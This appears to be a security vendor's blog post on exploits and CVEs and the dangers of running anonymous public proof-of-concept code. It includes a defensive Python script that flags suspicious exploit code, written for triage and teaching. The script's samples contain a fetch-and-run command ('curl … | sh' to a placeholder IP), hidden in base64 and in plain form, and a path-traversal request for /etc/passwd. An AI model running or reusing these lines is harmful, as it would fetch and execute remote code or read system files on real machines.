A common tactic of attackers trying to breach an environment is to run an exploit against a known vulnerability in an application or device present in the targeted infrastructure. Exploiting a vulnerability can give an attacker privileges or capabilities they would not normally be granted. Pen testers use exploits for the same reason, to show what a threat actor could actually achieve against an environment. But where exactly do these exploits come from, and are they all safe to use? Let's look at how vulnerabilities and exploits relate, who writes exploits, and how to know which ones can be trusted.
The Relationship Between Exploits and Vulnerabilities
Every infrastructure is made up of different applications and devices. Sometimes, one of these assets is released with an unintentional bug or weakness. Threat actors are constantly on the lookout for them, as they can provide a point of entry that can be used to eventually gain full access.
There are many types of security weaknesses that can be exploited in different ways. Most have been catalogued in a community list maintained by MITRE called the Common Weakness Enumeration (CWE). Examples include cross-site scripting (CWE-79), missing authorization (CWE-862), classic buffer overflow (CWE-120), and improper privilege management (CWE-269). When one of these weaknesses is present in a specific device or piece of software, that instance is a vulnerability.
When a vulnerability is found or confirmed by either the vendor or a third party, it can be reported and assigned an identifier from the Common Vulnerabilities and Exposures (CVE) list, issued by MITRE or a CVE Numbering Authority (CNA). The ID has the form CVE-YYYY-NNNN (year of assignment plus a sequence number) and gives organizations a common name to check their assets against. Typically, an advisory is published alongside the CVE describing the affected versions, the impact, and whether a workaround or patch is available.
Exploits are simply the means by which these vulnerabilities are taken advantage of. They can be a piece of code, a tool, or a sequence of commands or requests. Some exploits can be launched remotely against an exposed service, while others must run locally, so a threat actor first needs phishing or another foothold to get them executed on the target.
Exploits remain useful to attackers long after a vulnerability has been disclosed and patched. Many organizations don't keep up with advisories, or fail to patch all of their systems. The Cybersecurity & Infrastructure Security Agency (CISA) publishes a list of the most routinely exploited vulnerabilities for exactly this reason. For example, 2020 saw an increase in attacks on VPN appliances, such as the arbitrary code execution vulnerability in Citrix Gateway/ADC appliances (CVE-2019-19781) and the arbitrary file read vulnerability in Pulse Secure VPN servers (CVE-2019-11510), both disclosed in 2019 and still being exploited a year later.
Who Can Write an Exploit?
Attackers who discover a vulnerability usually have to write the exploit themselves. Other exploits are readily available on the internet, often posted anonymously by other attackers. On the ethical hacking side, exploit development is an advanced penetration testing skill that takes time to master, and pen testers on an engagement rarely have the budget to develop a new exploit from scratch. Many search for and use pre-written exploits they find online, often the very same ones attackers use. Because exploit writing takes time and expertise, attackers and pen testers alike are always looking for exploits or exploit libraries that save them the effort.
What’s the Problem with Using Open Source Exploits?
There are a few key problems for pen testers who rely on publicly posted exploits:
They may not be safe. An exploit that is freely available online can't be trusted on sight. It is often posted anonymously, so there is no way to verify who wrote it or why. A proof of concept written by a threat actor may carry its own payload: a call-back to the poster's infrastructure, a backdoor, or code that damages the tester's own system or the client's target. Reading the code before running it, and running it first in an isolated lab, is the minimum check.
They may not work. If you're not sure of the source of the exploit, you also can't be sure it does what it claims. Pen testers have to go through time-consuming quality assurance to confirm an exploit is both safe and effective, so a free exploit that doesn't work may waste more time than it saves.
The one you need may not exist. Searching for a public exploit for a given vulnerability may prove fruitless. Pen testers can't count on a stranger having already written the exploit they need.
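The "read it before you run it" check described above can be partly automated. The following script is an added example, not code from the original post or from Core Security: it does a static triage of a downloaded proof-of-concept script, flagging the indicators that distinguish a PoC that only talks to its target from one that also executes an embedded payload or calls home. Both PoC samples are constructed for the demonstration (the IP 198.51.100.7 is from the TEST-NET-2 documentation range), and the rule names and severities are this example's own choices, not an industry standard.

```python
"""Static triage of a downloaded proof-of-concept exploit before it is run.

Added example (not Core Security's code). It scans a PoC's text for signs
that a 'free' exploit does more than it claims: encoded blobs, dynamic code
execution, pipes into a shell, hard-coded call-back endpoints, persistence.
"""
import base64
import re

# Rule name, triage severity, pattern. "high" means: read the code first.
RULES = [
    ("dynamic_exec", "high",
     re.compile(r"\b(?:exec|eval|compile|__import__)\s*\(")),
    ("pipe_to_shell", "high",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b")),
    ("persistence_path", "high",
     re.compile(r"authorized_keys|crontab|/etc/rc\.local|\.bashrc")),
    ("shell_exec", "medium",
     re.compile(r"\bos\.system\s*\(|\bos\.popen\s*\(|\bsubprocess\.\w+\s*\(|shell\s*=\s*True")),
    ("hardcoded_endpoint", "medium",
     re.compile(r"https?://[^\s\"']+|\b(?:\d{1,3}\.){3}\d{1,3}\b")),
]

# A run of base64 alphabet long enough to hide a command or a second stage.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _decode_blob(blob):
    """Return the blob's decoded text if it is valid base64 of readable text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (ValueError, TypeError):  # binascii.Error subclasses ValueError
        return None
    text = raw.decode("utf-8", errors="replace")
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return text if text and printable / len(text) > 0.9 else None


def triage_poc(source, depth=0):
    """Scan PoC source line by line and return a list of finding dicts.

    Decoded blobs are scanned again (depth + 1): the hidden payload is
    what matters, not the fact that something was encoded.
    """
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, severity, pattern in RULES:
            m = pattern.search(line)
            if m:
                findings.append({"rule": name, "severity": severity,
                                 "line": lineno, "depth": depth,
                                 "match": m.group(0)})
        for blob in B64_BLOB.findall(line):
            decoded = _decode_blob(blob)
            # A blob that decodes to text is far more suspicious than a hash.
            findings.append({"rule": "encoded_blob",
                             "severity": "high" if decoded else "medium",
                             "line": lineno, "depth": depth,
                             "match": blob[:24] + "...", "decoded": decoded})
            if decoded and depth < 2:
                findings.extend(triage_poc(decoded, depth + 1))
    return findings


def risk_level(findings):
    """Collapse findings into a go/no-go label for the tester."""
    severities = {f["severity"] for f in findings}
    if "high" in severities:
        return "do-not-run"
    if "medium" in severities:
        return "review"
    return "clean"


# Constructed samples. CLEAN_POC only talks to the target given on argv.
CLEAN_POC = """\
import sys
import requests

target = sys.argv[1]  # constructed path-traversal probe, not a real CVE
r = requests.get(f"{target}/files/../etc/passwd", timeout=10)
print(r.status_code, len(r.text))
"""

# SUSPICIOUS_POC looks similar but runs a hidden second stage first.
_PAYLOAD = b'import os; os.system("curl http://198.51.100.7/i | sh")'
SUSPICIOUS_POC = f"""\
import sys, base64, subprocess

target = sys.argv[1]
# 'helper' that actually executes an embedded payload before any probe
exec(base64.b64decode("{base64.b64encode(_PAYLOAD).decode()}"))
subprocess.call("curl http://198.51.100.7/i | sh", shell=True)
print("sending probe to", target)
"""

if __name__ == "__main__":
    for label, poc in (("clean", CLEAN_POC), ("suspicious", SUSPICIOUS_POC)):
        found = triage_poc(poc)
        print(f"{label}: {risk_level(found)}")
        for f in found:
            indent = "  " * (f["depth"] + 1)
            print(f"{indent}[{f['severity']}] {f['rule']} line {f['line']}: {f['match']}")
```

Running it reports the clean sample as "clean" and the suspicious one as "do-not-run", with the decoded blob's `os.system`/`curl | sh` call-back listed as depth-1 findings. Pattern matching like this only catches the lazy cases; it complements, and does not replace, reading the PoC and detonating it in an isolated lab first.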
What Are the Benefits of Using Enterprise Exploits?
Access to an enterprise exploit library is often a benefit that comes with owning an enterprise pen testing tool. Those who have access to one gain three significant advantages.
They're written by experts. With an enterprise library you know exactly where your exploits come from: experienced pen testers and researchers who not only write each exploit but validate it, so you can be confident it is both safe to run and does what it claims.
They're kept up to date. Just as pen testing tools are meant to save time, so are their exploit libraries. Having researchers tasked with writing and verifying exploits as new vulnerabilities are disclosed means pen testers with access to such a library are not delayed by having to stop and write an exploit from scratch.
They're not freely available to attackers. Threat actors cannot simply download or purchase an enterprise exploit library for their own use. For instance, Core Security uses a thorough vetting process and takes care not to sell Core Impact and its exploit library to any organization that intends to use them for malicious purposes.
Ultimately, enterprise exploit libraries are one more way for pen testers to help organizations stay one step ahead of attackers.